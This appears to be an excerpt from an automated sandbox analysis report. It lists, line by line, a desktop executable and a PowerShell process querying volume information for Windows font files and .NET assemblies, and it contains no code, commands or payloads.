Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
